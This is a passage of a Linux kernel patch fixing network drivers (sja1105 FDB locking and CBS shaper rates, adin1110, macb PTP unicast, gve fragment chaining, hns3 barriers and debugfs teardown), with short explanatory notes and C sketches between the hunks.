+ 	if (!vid) {
+ 		switch (db.type) {
+@@ -1819,12 +1820,16 @@ static int sja1105_fdb_add(struct dsa_switch *ds, int port,
+ 		}
+ 	}
+ 
+-	return priv->info->fdb_add_cmd(ds, port, addr, vid);
++	mutex_lock(&priv->fdb_lock);
++	rc = priv->info->fdb_add_cmd(ds, port, addr, vid);
++	mutex_unlock(&priv->fdb_lock);
++
++	return rc;
+ }
+ 
+-static int sja1105_fdb_del(struct dsa_switch *ds, int port,
+-			   const unsigned char *addr, u16 vid,
+-			   struct dsa_db db)
++static int __sja1105_fdb_del(struct dsa_switch *ds, int port,
++			     const unsigned char *addr, u16 vid,
++			     struct dsa_db db)
+ {
+ 	struct sja1105_private *priv = ds->priv;
+ 
+@@ -1844,6 +1849,20 @@ static int sja1105_fdb_del(struct dsa_switch *ds, int port,
+ 	return priv->info->fdb_del_cmd(ds, port, addr, vid);
+ }
+ 
++static int sja1105_fdb_del(struct dsa_switch *ds, int port,
++			   const unsigned char *addr, u16 vid,
++			   struct dsa_db db)
++{
++	struct sja1105_private *priv = ds->priv;
++	int rc;
++
++	mutex_lock(&priv->fdb_lock);
++	rc = __sja1105_fdb_del(ds, port, addr, vid, db);
++	mutex_unlock(&priv->fdb_lock);
++
++	return rc;
++}
++
+ static int sja1105_fdb_dump(struct dsa_switch *ds, int port,
+ 			    dsa_fdb_dump_cb_t *cb, void *data)
+ {
+@@ -1875,13 +1894,14 @@ static int sja1105_fdb_dump(struct dsa_switch *ds, int port,
+ 		if (!(l2_lookup.destports & BIT(port)))
+ 			continue;
+ 
+-		/* We need to hide the FDB entry for unknown multicast */
+-		if (l2_lookup.macaddr == SJA1105_UNKNOWN_MULTICAST &&
+-		    l2_lookup.mask_macaddr == SJA1105_UNKNOWN_MULTICAST)
+-			continue;
+-
+ 		u64_to_ether_addr(l2_lookup.macaddr, macaddr);
+ 
++		/* Hardware FDB is shared for fdb and mdb, "bridge fdb show"
++		 * only wants to see unicast
++		 */
++		if (is_multicast_ether_addr(macaddr))
++			continue;
++
+ 		/* We need to hide the dsa_8021q VLANs from the user. */
+ 		if (vid_is_dsa_8021q(l2_lookup.vlanid))
+ 			l2_lookup.vlanid = 0;
+@@ -1905,6 +1925,8 @@ static void sja1105_fast_age(struct dsa_switch *ds, int port)
+ 	};
+ 	int i;
+ 
++	mutex_lock(&priv->fdb_lock);
++
+ 	for (i = 0; i < SJA1105_MAX_L2_LOOKUP_COUNT; i++) {
+ 		struct sja1105_l2_lookup_entry l2_lookup = {0};
+ 		u8 macaddr[ETH_ALEN];
+@@ -1918,7 +1940,7 @@ static void sja1105_fast_age(struct dsa_switch *ds, int port)
+ 		if (rc) {
+ 			dev_err(ds->dev, "Failed to read FDB: %pe\n",
+ 				ERR_PTR(rc));
+-			return;
++			break;
+ 		}
+ 
+ 		if (!(l2_lookup.destports & BIT(port)))
+@@ -1930,14 +1952,16 @@ static void sja1105_fast_age(struct dsa_switch *ds, int port)
+ 
+ 		u64_to_ether_addr(l2_lookup.macaddr, macaddr);
+ 
+-		rc = sja1105_fdb_del(ds, port, macaddr, l2_lookup.vlanid, db);
++		rc = __sja1105_fdb_del(ds, port, macaddr, l2_lookup.vlanid, db);
+ 		if (rc) {
+ 			dev_err(ds->dev,
+ 				"Failed to delete FDB entry %pM vid %lld: %pe\n",
+ 				macaddr, l2_lookup.vlanid, ERR_PTR(rc));
+-			return;
++			break;
+ 		}
+ 	}
++
++	mutex_unlock(&priv->fdb_lock);
+ }
+ 
+ static int sja1105_mdb_add(struct dsa_switch *ds, int port,
+@@ -2122,11 +2146,36 @@ static void sja1105_bridge_leave(struct dsa_switch *ds, int port,
+ }
+ 
+ #define BYTES_PER_KBIT (1000LL / 8)
++/* Port 0 (the uC port) does not have CBS shapers */
++#define SJA1110_FIXED_CBS(port, prio) ((((port) - 1) * SJA1105_NUM_TC) + (prio))
++
++static int sja1105_find_cbs_shaper(struct sja1105_private *priv,
++				   int port, int prio)
++{
++	int i;
++
++	if (priv->info->fixed_cbs_mapping) {
++		i = SJA1110_FIXED_CBS(port, prio);
++		if (i >= 0 && i < priv->info->num_cbs_shapers)
++			return i;
++
++		return -1;
++	}
++
++	for (i = 0; i < priv->info->num_cbs_shapers; i++)
++		if (priv->cbs[i].port == port && priv->cbs[i].prio == prio)
++			return i;
++
++	return -1;
++}
+ 
+ static int sja1105_find_unused_cbs_shaper(struct sja1105_private *priv)
+ {
+ 	int i;
+ 
++	if (priv->info->fixed_cbs_mapping)
++		return -1;
++
+ 	for (i = 0; i < priv->info->num_cbs_shapers; i++)
+ 		if (!priv->cbs[i].idle_slope && !priv->cbs[i].send_slope)
+ 			return i;
+@@ -2157,14 +2206,20 @@ static int sja1105_setup_tc_cbs(struct dsa_switch *ds, int port,
+ {
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct sja1105_cbs_entry *cbs;
++	s64 port_transmit_rate_kbps;
+ 	int index;
+ 
+ 	if (!offload->enable)
+ 		return sja1105_delete_cbs_shaper(priv, port, offload->queue);
+ 
+-	index = sja1105_find_unused_cbs_shaper(priv);
+-	if (index < 0)
+-		return -ENOSPC;
++	/* The user may be replacing an existing shaper */
++	index = sja1105_find_cbs_shaper(priv, port, offload->queue);
++	if (index < 0) {
++		/* That isn't the case - see if we can allocate a new one */
++		index = sja1105_find_unused_cbs_shaper(priv);
++		if (index < 0)
++			return -ENOSPC;
++	}
+ 
+ 	cbs = &priv->cbs[index];
+ 	cbs->port = port;
+@@ -2174,9 +2229,17 @@ static int sja1105_setup_tc_cbs(struct dsa_switch *ds, int port,
+ 	 */
+ 	cbs->credit_hi = offload->hicredit;
+ 	cbs->credit_lo = abs(offload->locredit);
+-	/* User space is in kbits/sec, hardware in bytes/sec */
+-	cbs->idle_slope = offload->idleslope * BYTES_PER_KBIT;
+-	cbs->send_slope = abs(offload->sendslope * BYTES_PER_KBIT);
++	/* User space is in kbits/sec, while the hardware is in bytes/sec times
++	 * link speed. Since the given offload->sendslope is good only for the
++	 * current link speed anyway, and user space is likely to reprogram it
++	 * when that changes, don't even bother to track the port's link speed,
++	 * but deduce the port transmit rate from idleslope - sendslope.
++	 */
++	port_transmit_rate_kbps = offload->idleslope - offload->sendslope;
++	cbs->idle_slope = div_s64(offload->idleslope * BYTES_PER_KBIT,
++				  port_transmit_rate_kbps);
++	cbs->send_slope = div_s64(abs(offload->sendslope * BYTES_PER_KBIT),
++				  port_transmit_rate_kbps);
+ 	/* Convert the negative values from 64-bit 2's complement
+ 	 * to 32-bit 2's complement (for the case of 0x80000000 whose
+ 	 * negative is still negative).
+@@ -2241,6 +2304,7 @@ int sja1105_static_config_reload(struct sja1105_private *priv,
+ 	int rc, i;
+ 	s64 now;
+ 
++	mutex_lock(&priv->fdb_lock);
+ 	mutex_lock(&priv->mgmt_lock);
+ 
+ 	mac = priv->static_config.tables[BLK_IDX_MAC_CONFIG].entries;
+@@ -2355,6 +2419,7 @@ int sja1105_static_config_reload(struct sja1105_private *priv,
+ 		goto out;
+ out:
+ 	mutex_unlock(&priv->mgmt_lock);
++	mutex_unlock(&priv->fdb_lock);
+ 
+ 	return rc;
+ }
+@@ -2924,7 +2989,9 @@ static int sja1105_port_mcast_flood(struct sja1105_private *priv, int to,
+ {
+ 	struct sja1105_l2_lookup_entry *l2_lookup;
+ 	struct sja1105_table *table;
+-	int match;
++	int match, rc;
++
++	mutex_lock(&priv->fdb_lock);
+ 
+ 	table = &priv->static_config.tables[BLK_IDX_L2_LOOKUP];
+ 	l2_lookup = table->entries;
+@@ -2937,7 +3004,8 @@ static int sja1105_port_mcast_flood(struct sja1105_private *priv, int to,
+ 	if (match == table->entry_count) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Could not find FDB entry for unknown multicast");
+-		return -ENOSPC;
++		rc = -ENOSPC;
++		goto out;
+ 	}
+ 
+ 	if (flags.val & BR_MCAST_FLOOD)
+@@ -2945,10 +3013,13 @@ static int sja1105_port_mcast_flood(struct sja1105_private *priv, int to,
+ 	else
+ 		l2_lookup[match].destports &= ~BIT(to);
+ 
+-	return sja1105_dynamic_config_write(priv, BLK_IDX_L2_LOOKUP,
+-					    l2_lookup[match].index,
+-					    &l2_lookup[match],
+-					    true);
++	rc = sja1105_dynamic_config_write(priv, BLK_IDX_L2_LOOKUP,
++					  l2_lookup[match].index,
++					  &l2_lookup[match], true);
++out:
++	mutex_unlock(&priv->fdb_lock);
++
++	return rc;
+ }
+ 
+ static int sja1105_port_pre_bridge_flags(struct dsa_switch *ds, int port,
+@@ -3318,6 +3389,7 @@ static int sja1105_probe(struct spi_device *spi)
+ 	mutex_init(&priv->ptp_data.lock);
+ 	mutex_init(&priv->dynamic_config_lock);
+ 	mutex_init(&priv->mgmt_lock);
++	mutex_init(&priv->fdb_lock);
+ 	spin_lock_init(&priv->ts_id_lock);
+ 
+ 	rc = sja1105_parse_dt(priv);
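
The CBS hunk above is a unit conversion: tc(8) passes idleslope and
sendslope in kbit/s, while this hardware expects the slopes as
fractions of the port transmit rate, and for a well-formed CBS
offload idleslope - sendslope equals the link speed, so the divisor
falls out of the request itself. A runnable sketch of the arithmetic:

#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>

#define BYTES_PER_KBIT (1000LL / 8)

int main(void)
{
	/* Example offload on a 1 Gbit/s link: 30 Mbit/s reserved. */
	int64_t idleslope = 30000;	/* kbit/s */
	int64_t sendslope = -970000;	/* kbit/s */
	int64_t rate_kbps = idleslope - sendslope;	/* 1000000 */

	int64_t idle = idleslope * BYTES_PER_KBIT / rate_kbps;
	int64_t send = llabs(sendslope * BYTES_PER_KBIT) / rate_kbps;

	printf("idle_slope=%" PRId64 " send_slope=%" PRId64 "\n",
	       idle, send);
	return 0;
}
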
+diff --git a/drivers/net/dsa/sja1105/sja1105_spi.c b/drivers/net/dsa/sja1105/sja1105_spi.c
+index d3c9ad6d39d46..e6b61aef4127c 100644
+--- a/drivers/net/dsa/sja1105/sja1105_spi.c
++++ b/drivers/net/dsa/sja1105/sja1105_spi.c
+@@ -781,6 +781,7 @@ const struct sja1105_info sja1110a_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+@@ -831,6 +832,7 @@ const struct sja1105_info sja1110b_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+@@ -881,6 +883,7 @@ const struct sja1105_info sja1110c_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+@@ -931,6 +934,7 @@ const struct sja1105_info sja1110d_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index ecce5f7a549f2..ed2863ed6a5bb 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -740,7 +740,7 @@ static int adin1110_broadcasts_filter(struct adin1110_port_priv *port_priv,
+ 	u32 port_rules = 0;
+ 	u8 mask[ETH_ALEN];
+ 
+-	memset(mask, 0xFF, ETH_ALEN);
++	eth_broadcast_addr(mask);
+ 
+ 	if (accept_broadcast && port_priv->state == BR_STATE_FORWARDING)
+ 		port_rules = adin1110_port_rules(port_priv, true, true);
+@@ -761,7 +761,7 @@ static int adin1110_set_mac_address(struct net_device *netdev,
+ 		return -EADDRNOTAVAIL;
+ 
+ 	eth_hw_addr_set(netdev, dev_addr);
+-	memset(mask, 0xFF, ETH_ALEN);
++	eth_broadcast_addr(mask);
+ 
+ 	mac_slot = (!port_priv->nr) ?  ADIN_MAC_P1_ADDR_SLOT : ADIN_MAC_P2_ADDR_SLOT;
+ 	port_rules = adin1110_port_rules(port_priv, true, false);
+@@ -1251,7 +1251,7 @@ static int adin1110_port_set_blocking_state(struct adin1110_port_priv *port_priv
+ 		goto out;
+ 
+ 	/* Allow only BPDUs to be passed to the CPU */
+-	memset(mask, 0xFF, ETH_ALEN);
++	eth_broadcast_addr(mask);
+ 	port_rules = adin1110_port_rules(port_priv, true, false);
+ 	ret = adin1110_write_mac_address(port_priv, mac_slot, mac,
+ 					 mask, port_rules);
+@@ -1365,8 +1365,8 @@ static int adin1110_fdb_add(struct adin1110_port_priv *port_priv,
+ 		return -ENOMEM;
+ 
+ 	other_port = priv->ports[!port_priv->nr];
+-	port_rules = adin1110_port_rules(port_priv, false, true);
+-	memset(mask, 0xFF, ETH_ALEN);
++	port_rules = adin1110_port_rules(other_port, false, true);
++	eth_broadcast_addr(mask);
+ 
+ 	return adin1110_write_mac_address(other_port, mac_nr, (u8 *)fdb->addr,
+ 					  mask, port_rules);
+diff --git a/drivers/net/ethernet/cadence/macb.h b/drivers/net/ethernet/cadence/macb.h
+index 9c410f93a1039..1aa578c1ca4ad 100644
+--- a/drivers/net/ethernet/cadence/macb.h
++++ b/drivers/net/ethernet/cadence/macb.h
+@@ -95,6 +95,8 @@
+ #define GEM_SA4B		0x00A0 /* Specific4 Bottom */
+ #define GEM_SA4T		0x00A4 /* Specific4 Top */
+ #define GEM_WOL			0x00b8 /* Wake on LAN */
++#define GEM_RXPTPUNI		0x00D4 /* PTP RX Unicast address */
++#define GEM_TXPTPUNI		0x00D8 /* PTP TX Unicast address */
+ #define GEM_EFTSH		0x00e8 /* PTP Event Frame Transmitted Seconds Register 47:32 */
+ #define GEM_EFRSH		0x00ec /* PTP Event Frame Received Seconds Register 47:32 */
+ #define GEM_PEFTSH		0x00f0 /* PTP Peer Event Frame Transmitted Seconds Register 47:32 */
+@@ -245,6 +247,8 @@
+ #define MACB_TZQ_OFFSET		12 /* Transmit zero quantum pause frame */
+ #define MACB_TZQ_SIZE		1
+ #define MACB_SRTSM_OFFSET	15 /* Store Receive Timestamp to Memory */
++#define MACB_PTPUNI_OFFSET	20 /* PTP Unicast packet enable */
++#define MACB_PTPUNI_SIZE	1
+ #define MACB_OSSMODE_OFFSET	24 /* Enable One Step Synchro Mode */
+ #define MACB_OSSMODE_SIZE	1
+ #define MACB_MIIONRGMII_OFFSET	28 /* MII Usage on RGMII Interface */
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 5fb991835078a..54b032a46b48a 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -288,6 +288,11 @@ static void macb_set_hwaddr(struct macb *bp)
+ 	top = cpu_to_le16(*((u16 *)(bp->dev->dev_addr + 4)));
+ 	macb_or_gem_writel(bp, SA1T, top);
+ 
++	if (gem_has_ptp(bp)) {
++		gem_writel(bp, RXPTPUNI, bottom);
++		gem_writel(bp, TXPTPUNI, bottom);
++	}
++
+ 	/* Clear unused address register sets */
+ 	macb_or_gem_writel(bp, SA2B, 0);
+ 	macb_or_gem_writel(bp, SA2T, 0);
+@@ -700,8 +705,6 @@ static void macb_mac_link_up(struct phylink_config *config,
+ 		if (rx_pause)
+ 			ctrl |= MACB_BIT(PAE);
+ 
+-		macb_set_tx_clk(bp, speed);
+-
+ 		/* Initialize rings & buffers as clearing MACB_BIT(TE) in link down
+ 		 * cleared the pipeline and control registers.
+ 		 */
+@@ -721,8 +724,15 @@ static void macb_mac_link_up(struct phylink_config *config,
+ 
+ 	spin_unlock_irqrestore(&bp->lock, flags);
+ 
+-	/* Enable Rx and Tx */
+-	macb_writel(bp, NCR, macb_readl(bp, NCR) | MACB_BIT(RE) | MACB_BIT(TE));
++	if (!(bp->caps & MACB_CAPS_MACB_IS_EMAC))
++		macb_set_tx_clk(bp, speed);
++
++	/* Enable Rx and Tx; Enable PTP unicast */
++	ctrl = macb_readl(bp, NCR);
++	if (gem_has_ptp(bp))
++		ctrl |= MACB_BIT(PTPUNI);
++
++	macb_writel(bp, NCR, ctrl | MACB_BIT(RE) | MACB_BIT(TE));
+ 
+ 	netif_tx_wake_all_queues(ndev);
+ }
+diff --git a/drivers/net/ethernet/google/gve/gve_rx_dqo.c b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+index 2e6461b0ea8bc..a9409e3721ad7 100644
+--- a/drivers/net/ethernet/google/gve/gve_rx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+@@ -492,7 +492,10 @@ static int gve_rx_append_frags(struct napi_struct *napi,
+ 		if (!skb)
+ 			return -1;
+ 
+-		skb_shinfo(rx->ctx.skb_tail)->frag_list = skb;
++		if (rx->ctx.skb_tail == rx->ctx.skb_head)
++			skb_shinfo(rx->ctx.skb_head)->frag_list = skb;
++		else
++			rx->ctx.skb_tail->next = skb;
+ 		rx->ctx.skb_tail = skb;
+ 		num_frags = 0;
+ 	}
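
The gve hunk fixes fragment chaining: only the first fragment hangs
off the head skb's frag_list, and every later one links through the
previous tail's next pointer; the old code overwrote the current
tail's frag_list each time, orphaning fragments. A stripped-down
sketch of the corrected append:

#include <stddef.h>

struct buf {
	struct buf *frag_list;	/* head's pointer into the chain */
	struct buf *next;	/* sibling link inside the chain */
};

struct rx_ctx {
	struct buf *head;
	struct buf *tail;
};

static void append_frag(struct rx_ctx *ctx, struct buf *b)
{
	if (ctx->tail == ctx->head)
		ctx->head->frag_list = b;	/* first fragment */
	else
		ctx->tail->next = b;		/* subsequent ones */
	ctx->tail = b;
}
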
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hnae3.h b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+index fcb8b6dc5ab92..c693bb701ba3e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hnae3.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+@@ -797,6 +797,7 @@ struct hnae3_tc_info {
+ 	u8 max_tc; /* Total number of TCs */
+ 	u8 num_tc; /* Total number of enabled TCs */
+ 	bool mqprio_active;
++	bool dcb_ets_active;
+ };
+ 
+ #define HNAE3_MAX_DSCP			64
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index 69d1549e63a98..00eed9835cb55 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -1406,9 +1406,9 @@ int hns3_dbg_init(struct hnae3_handle *handle)
+ 	return 0;
+ 
+ out:
+-	mutex_destroy(&handle->dbgfs_lock);
+ 	debugfs_remove_recursive(handle->hnae3_dbgfs);
+ 	handle->hnae3_dbgfs = NULL;
++	mutex_destroy(&handle->dbgfs_lock);
+ 	return ret;
+ }
+ 
+@@ -1416,6 +1416,9 @@ void hns3_dbg_uninit(struct hnae3_handle *handle)
+ {
+ 	u32 i;
+ 
++	debugfs_remove_recursive(handle->hnae3_dbgfs);
++	handle->hnae3_dbgfs = NULL;
++
+ 	for (i = 0; i < ARRAY_SIZE(hns3_dbg_cmd); i++)
+ 		if (handle->dbgfs_buf[i]) {
+ 			kvfree(handle->dbgfs_buf[i]);
+@@ -1423,8 +1426,6 @@ void hns3_dbg_uninit(struct hnae3_handle *handle)
+ 		}
+ 
+ 	mutex_destroy(&handle->dbgfs_lock);
+-	debugfs_remove_recursive(handle->hnae3_dbgfs);
+-	handle->hnae3_dbgfs = NULL;
+ }
+ 
+ void hns3_dbg_register_debugfs(const char *debugfs_dir_name)
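
The hns3_dbg_uninit() reorder matters because debugfs handlers can
keep running until the entries are removed: unpublish the files
first, then free the buffers and destroy the lock those handlers
take. A generic sketch of the teardown ordering:

#include <pthread.h>
#include <stdlib.h>

struct dbg {
	pthread_mutex_t lock;
	void *buf;
};

static void unpublish_entries(struct dbg *d)
{
	(void)d;	/* stand-in for debugfs_remove_recursive() */
}

static void dbg_uninit(struct dbg *d)
{
	unpublish_entries(d);		 /* 1: no new handlers start */
	free(d->buf);			 /* 2: nothing touches buf now */
	d->buf = NULL;
	pthread_mutex_destroy(&d->lock); /* 3: nobody can hold it */
}
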
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 61f833d61f583..8aae179554a81 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -2102,8 +2102,12 @@ static void hns3_tx_doorbell(struct hns3_enet_ring *ring, int num,
+ 	 */
+ 	if (test_bit(HNS3_NIC_STATE_TX_PUSH_ENABLE, &priv->state) && num &&
+ 	    !ring->pending_buf && num <= HNS3_MAX_PUSH_BD_NUM && doorbell) {
++		/* This smp_store_release() pairs with smp_load_acquire() in
++		 * hns3_nic_reclaim_desc(). Ensure that the BD valid bit
++		 * is updated.
++		 */
++		smp_store_release(&ring->last_to_use, ring->next_to_use);
+ 		hns3_tx_push_bd(ring, num);
+-		WRITE_ONCE(ring->last_to_use, ring->next_to_use);
+ 		return;
+ 	}
+ 
+@@ -2114,6 +2118,11 @@ static void hns3_tx_doorbell(struct hns3_enet_ring *ring, int num,
+ 		return;
+ 	}
+ 
++	/* This smp_store_release() pairs with smp_load_acquire() in
++	 * hns3_nic_reclaim_desc(). Ensure that the BD valid bit is updated.
++	 */
++	smp_store_release(&ring->last_to_use, ring->next_to_use);
++
+ 	if (ring->tqp->mem_base)
+ 		hns3_tx_mem_doorbell(ring);
+ 	else
+@@ -2121,7 +2130,6 @@ static void hns3_tx_doorbell(struct hns3_enet_ring *ring, int num,
+ 		       ring->tqp->io_base + HNS3_RING_TX_RING_TAIL_REG);
+ 
+ 	ring->pending_buf = 0;
+-	WRITE_ONCE(ring->last_to_use, ring->next_to_use);
+ }
+ 
+ static void hns3_tsyn(struct net_device *netdev, struct sk_buff *skb,
+@@ -3307,8 +3315,6 @@ static void hns3_set_default_feature(struct net_device *netdev)
+ 
+ 	netdev->priv_flags |= IFF_UNICAST_FLT;
+ 
+-	netdev->gso_partial_features |= NETIF_F_GSO_GRE_CSUM;
+-
+ 	netdev->features |= NETIF_F_HW_VLAN_CTAG_FILTER |
+ 		NETIF_F_HW_VLAN_CTAG_TX | NETIF_F_HW_VLAN_CTAG_RX |
+ 		NETIF_F_RXCSUM | NETIF_F_SG | NETIF_F_GSO |
+@@ -3562,9 +3568,8 @@ static void hns3_reuse_buffer(struct hns3_enet_ring *ring, int i)
+ static bool hns3_nic_reclaim_desc(struct hns3_enet_ring *ring,
+ 				  int *bytes, int *pkts, int budget)
+ {
+-	/* pair with ring->last_to_use update in hns3_tx_doorbell(),
+-	 * smp_store_release() is not used in hns3_tx_doorbell() because
+-	 * the doorbell operation already have the needed barrier operation.
++	/* This smp_load_acquire() pairs with smp_store_release() in
++	 * hns3_tx_doorbell().
+ 	 */
+ 	int ltu = smp_load_acquire(&ring->last_to_use);
+ 	int ntc = ring->next_to_clean;
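
The doorbell/reclaim hunks restore a proper release/acquire pairing
on last_to_use, so the consumer can never observe the new index
before the descriptor contents it publishes. A C11-atomics sketch of
the same discipline (the kernel uses smp_store_release() and
smp_load_acquire() instead):

#include <stdatomic.h>

struct ring {
	_Atomic int last_to_use;
	int next_to_use;
};

/* Producer: descriptor writes (the BD valid bit) must be visible
 * before the index that publishes them. */
static void tx_doorbell(struct ring *r)
{
	atomic_store_explicit(&r->last_to_use, r->next_to_use,
			      memory_order_release);
}

/* Consumer: pairs with the release store above, so descriptor reads
 * after this load see fully written entries. */
static int reclaim_limit(struct ring *r)
{
	return atomic_load_explicit(&r->last_to_use,
				    memory_order_acquire);
}
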
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+index cdf76fb58d45e..e22835ae8a941 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+@@ -776,7 +776,9 @@ static int hns3_get_link_ksettings(struct net_device *netdev,
+ 		hns3_get_ksettings(h, cmd);
+ 		break;
+ 	case HNAE3_MEDIA_TYPE_FIBER:
+-		if (module_type == HNAE3_MODULE_TYPE_CR)
++		if (module_type == HNAE3_MODULE_TYPE_UNKNOWN)
++			cmd->base.port = PORT_OTHER;
++		else if (module_type == HNAE3_MODULE_TYPE_CR)
+ 			cmd->base.port = PORT_DA;
+ 		else
+ 			cmd->base.port = PORT_FIBRE;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+index 09362823140d5..2740f0d703e4f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+@@ -251,7 +251,7 @@ static int hclge_ieee_setets(struct hnae3_handle *h, struct ieee_ets *ets)
+ 	int ret;
+ 
+ 	if (!(hdev->dcbx_cap & DCB_CAP_DCBX_VER_IEEE) ||
+-	    hdev->flag & HCLGE_FLAG_MQPRIO_ENABLE)
++	    h->kinfo.tc_info.mqprio_active)
+ 		return -EINVAL;
+ 
+ 	ret = hclge_ets_validate(hdev, ets, &num_tc, &map_changed);
+@@ -267,10 +267,7 @@ static int hclge_ieee_setets(struct hnae3_handle *h, struct ieee_ets *ets)
+ 	}
+ 
+ 	hclge_tm_schd_info_update(hdev, num_tc);
+-	if (num_tc > 1)
+-		hdev->flag |= HCLGE_FLAG_DCB_ENABLE;
+-	else
+-		hdev->flag &= ~HCLGE_FLAG_DCB_ENABLE;
++	h->kinfo.tc_info.dcb_ets_active = num_tc > 1;
+ 
+ 	ret = hclge_ieee_ets_to_tm_info(hdev, ets);
+ 	if (ret)
+@@ -463,7 +460,7 @@ static u8 hclge_getdcbx(struct hnae3_handle *h)
+ 	struct hclge_vport *vport = hclge_get_vport(h);
+ 	struct hclge_dev *hdev = vport->back;
+ 
+-	if (hdev->flag & HCLGE_FLAG_MQPRIO_ENABLE)
++	if (h->kinfo.tc_info.mqprio_active)
+ 		return 0;
+ 
+ 	return hdev->dcbx_cap;
+@@ -587,7 +584,8 @@ static int hclge_setup_tc(struct hnae3_handle *h,
+ 	if (!test_bit(HCLGE_STATE_NIC_REGISTERED, &hdev->state))
+ 		return -EBUSY;
+ 
+-	if (hdev->flag & HCLGE_FLAG_DCB_ENABLE)
++	kinfo = &vport->nic.kinfo;
++	if (kinfo->tc_info.dcb_ets_active)
+ 		return -EINVAL;
+ 
+ 	ret = hclge_mqprio_qopt_check(hdev, mqprio_qopt);
+@@ -601,7 +599,6 @@ static int hclge_setup_tc(struct hnae3_handle *h,
+ 	if (ret)
+ 		return ret;
+ 
+-	kinfo = &vport->nic.kinfo;
+ 	memcpy(&old_tc_info, &kinfo->tc_info, sizeof(old_tc_info));
+ 	hclge_sync_mqprio_qopt(&kinfo->tc_info, mqprio_qopt);
+ 	kinfo->tc_info.mqprio_active = tc > 0;
+@@ -610,13 +607,6 @@ static int hclge_setup_tc(struct hnae3_handle *h,
+ 	if (ret)
+ 		goto err_out;
+ 
+-	hdev->flag &= ~HCLGE_FLAG_DCB_ENABLE;
+-
+-	if (tc > 1)
+-		hdev->flag |= HCLGE_FLAG_MQPRIO_ENABLE;
+-	else
+-		hdev->flag &= ~HCLGE_FLAG_MQPRIO_ENABLE;
+-
+ 	return hclge_notify_init_up(hdev);
+ 
+ err_out:
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 5cb8f1818e51c..a1c59f4aae988 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -1517,7 +1517,7 @@ static int hclge_dbg_fd_tcam_read(struct hclge_dev *hdev, bool sel_x,
+ 	struct hclge_desc desc[3];
+ 	int pos = 0;
+ 	int ret, i;
+-	u32 *req;
++	__le32 *req;
+ 
+ 	hclge_cmd_setup_basic_desc(&desc[0], HCLGE_OPC_FD_TCAM_OP, true);
+ 	desc[0].flag |= cpu_to_le16(HCLGE_COMM_CMD_FLAG_NEXT);
+@@ -1542,22 +1542,22 @@ static int hclge_dbg_fd_tcam_read(struct hclge_dev *hdev, bool sel_x,
+ 			 tcam_msg.loc);
+ 
+ 	/* tcam_data0 ~ tcam_data1 */
+-	req = (u32 *)req1->tcam_data;
++	req = (__le32 *)req1->tcam_data;
+ 	for (i = 0; i < 2; i++)
+ 		pos += scnprintf(tcam_buf + pos, HCLGE_DBG_TCAM_BUF_SIZE - pos,
+-				 "%08x\n", *req++);
++				 "%08x\n", le32_to_cpu(*req++));
+ 
